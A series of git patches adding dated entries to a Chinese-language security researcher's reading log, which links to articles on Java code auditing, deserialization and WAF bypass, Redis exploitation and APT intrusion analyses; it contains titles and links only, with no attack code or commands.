From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 00:20:16 +0800 Subject: [PATCH 237/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 49fb0c7..603f323 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -232,3 +232,6 @@ + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** + 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** + +## 2023 ++ 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** From 7f0ca5f8a3fb33ddf178cf4032d9cf6e75eb3044 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 00:22:21 +0800 Subject: [PATCH 238/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 603f323..a28942e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -232,6 +232,7 @@ + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** + 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** ++ 2022/12/31 嗯其实没有看什么文章主要是在写代码,还是假装记录一下。新年快乐!!! ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** From 8e0db0695dc943634bea02e9063ed249f550d5c0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 2 Jan 2023 19:07:54 +0800 Subject: [PATCH 239/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a28942e..db8701a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -236,3 +236,4 @@ ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** ++ 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** From 3c6df7884f3ddf7dfccc922265c17a8e53725064 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 4 Jan 2023 15:37:54 +0800 Subject: [PATCH 240/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index db8701a..dd3a96a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -237,3 +237,4 @@ ## 2023 + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** ++ 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** From 027907f5030360b5a5931aa76146f86673d4b566 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 12:58:13 +0800 Subject: [PATCH 241/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dd3a96a..6abcd75 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -238,3 +238,4 @@ + 2023/01/01 [一文详解|如何写出优雅的代码](https://developer.aliyun.com/article/1117703) **新年第一篇 冲冲冲!!!!!** + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** ++ 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 4ffc6062320dfec42e32b3cd4c2085057a8da64c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 15:36:02 +0800 Subject: [PATCH 242/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6abcd75..b00662c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -239,3 +239,4 @@ + 2023/01/02 [华为云CTF cloud非预期解之k8s渗透实战](https://annevi.cn/2020/12/21/%e5%8d%8e%e4%b8%ba%e4%ba%91ctf-cloud%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e4%b9%8bk8s%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/) **学习** + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) From 3447aabfc31e1387637e5714a78ba6d6921f1fc6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 8 Jan 2023 22:06:36 +0800 Subject: [PATCH 243/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b00662c..5eac817 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -240,3 +240,4 @@ + 2023/01/04 [Soot 静态分析框架(五)Annotation 的实现](https://blog.csdn.net/raintungli/article/details/102634829) **soot中存在api直接调用注解信息** + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) ++ 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** From a47eca2bf38bf0fe3859626c0d1b6aa69d0a8986 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 Jan 2023 19:25:40 +0800 Subject: [PATCH 244/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5eac817..42c3703 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -241,3 +241,4 @@ + 2023/01/08 [浅谈Nacos漏洞之超管权限后续利用](https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247495724&idx=2&sn=dcc0629faaf7379bba94a34937db3358&chksm=c1760d83f6018495787c8c4e747f2507ae50ffc7d3fb318ac45892dd1b216b70e942b74259e1&mpshare=1&scene=23&srcid=0107IDEenH2fh5g0656NUtgL&sharer_sharetime=1673107217827&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** ++ 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** 
From 492fea085d8fc25314e9f6842c0b06defb20156f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 9 Jan 2023 19:31:44 +0800 Subject: [PATCH 245/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 42c3703..92a0bac 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -242,3 +242,4 @@ + 2023/01/08 [【Java 代码审计入门-06】文件包含漏洞原理与实际案例介绍](https://www.cnpanda.net/codeaudit/1037.html) + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** ++ 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** From 7b5746db08c0ff9e249a5211751cc8a0ddd137d5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 13:07:24 +0800 Subject: [PATCH 246/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 92a0bac..c244a14 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -243,3 +243,4 @@ + 2023/01/08 [第45篇:weblogic反序列化漏洞绕waf方法总结,2017-10271与2019-2725漏洞绕waf防护](https://mp.weixin.qq.com/s/8hUYRYoAqjthqgBI_zn9ZA) **weblogic中可以使用编码绕过** + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** ++ 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** From 48388de1dd14e9ed247b7479091471ab5a2ffdb3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 15:00:27 +0800 Subject: [PATCH 247/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c244a14..2db8cc4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -244,3 +244,4 @@ + 2023/01/09 [调教某数字杀软,权限维持so easy](https://mp.weixin.qq.com/s/IYGon3X4-cQwnwwb1WZWww) **现在还看不懂!** + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** ++ 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** From 29282c0611bcaac3f9a68f98850115175f842c82 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 10 Jan 2023 19:57:19 +0800 Subject: [PATCH 248/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2db8cc4..55dbdf9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -245,3 +245,4 @@ + 2023/01/09 [玩转CodeQLpy之代码审计实战案例](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247485587&idx=1&sn=70b400682976cf82fc1d41fceba7e76e&chksm=c2a1dc1af5d6550c7b5b19b8810ede0bb920c7dad168ac3db3c9cbedfc6e2d4b29a3b42144e6&mpshare=1&scene=23&srcid=01064grkrTL43aUSw4HyhlEh&sharer_sharetime=1673004615548&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **可以试一试自己的VI能不能扫描出来** + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** ++ 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** From ca66b589a30f06cee34ec0dac038910dfaf92ca7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:33:12 +0800 Subject: [PATCH 249/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 55dbdf9..bf7acba 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -246,3 +246,4 @@ + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) From 9593ba940a081aaeec14cea2c7063106a0f5e9e7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 11 Jan 2023 13:36:36 +0800 Subject: [PATCH 250/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bf7acba..1d481af 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -246,4 +246,4 @@ + 2023/01/10 [为什么你抓不到baidu的数据](https://mp.weixin.qq.com/s?__biz=MzUzNTY5MzU2MA==&mid=2247497288&idx=1&sn=1d634021528643c2f71e7cbf4dd7a0f7&chksm=fa8327dfcdf4aec9f798046e38ed5918d2df937c1ba7b7729c08e31b4c5c23cd13023c1c08f6&mpshare=1&scene=23&srcid=0110jBzdFMNuglOyMZh5teWu&sharer_sharetime=1673322185390&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **好牛皮啊** + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** -+ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) ++ 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) From 79776e236d7469e433b800ec4169ed1815ccb570 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 13 Jan 2023 20:45:41 +0800 Subject: [PATCH 251/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1d481af..5cd40c4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -247,3 +247,4 @@ + 2023/01/10 [EL表达式支持Lambda](http://aducode.github.io/posts/2015-07-14/hook_tomcat_el_expression.html) **np** + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) ++ 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** From d26fd31e43c6986fb6450f6e247b21cff20efcd1 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 14 Jan 2023 13:35:29 +0800 Subject: [PATCH 252/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5cd40c4..fa856a2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -248,3 +248,4 @@ + 2023/01/10 [HashSet 对象去重复处理](https://blog.csdn.net/wangjie1616/article/details/78416551) **去除重复的对象也可以使用commons.lang这个包来判断** + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** ++ 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) From 191e6674e4a3993acc1a01c8081712e70ee10d2a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 16 Jan 2023 22:15:51 +0800 Subject: [PATCH 253/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fa856a2..3606571 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -249,3 +249,4 @@ + 2023/01/11 [burp自定义解密数据插件](https://mp.weixin.qq.com/s/B-lBbVpJsPdCp1pjz2Rxdg) [某app测试](https://mp.weixin.qq.com/s/_7wSWy0gIMMZmVeOtFgdsw) + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) ++ 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** 
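Review bot: In the added 2023/01/16 line the link text appends ",redis的利用" to the article's English title inside the brackets, so the gloss reads as part of the title, while the bold annotation "npnp" carries no information. Keep the title alone in the brackets and move the gloss into the annotation in place of "npnp".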
From 1be80eadba1f76a4eb84f4abf2b07e5696500e67 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:44:55 +0800 Subject: [PATCH 254/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3606571..c207098 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -250,3 +250,4 @@ + 2023/01/13 [JVM Shellcode注入探索](https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A) **np** + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** ++ 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) From 67c2289b0cb2eb372d11a8e329ed26d38e1db2a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 17 Jan 2023 20:50:12 +0800 Subject: [PATCH 255/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c207098..ff05aa6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -251,3 +251,4 @@ + 2023/01/14 [第46篇:伊朗APT组织入侵美国政府内网全过程揭秘(上篇)](https://mp.weixin.qq.com/s/LarjLeYFqDQh7I0jpFZwHA) + 2023/01/16 [Hacking Redis for fun and CTF points,redis的利用](https://medium.com/@emil.lerner/hacking-redis-for-fun-and-ctf-points-3450c351bec1) **npnp** + 2023/01/17 [第47篇:ATT&CK矩阵攻击链分析-伊朗APT入侵美国政府内网(中篇)](https://mp.weixin.qq.com/s/vLBupn8etY1rvcgHmLNbIw) ++ 2023/01/17 [玩转CodeQLpy之用友GRP-U8漏洞挖掘](https://mp.weixin.qq.com/s/hYPdNN6skbikC3FFYRlbrQ) **可以尝试用vi跑一下** 
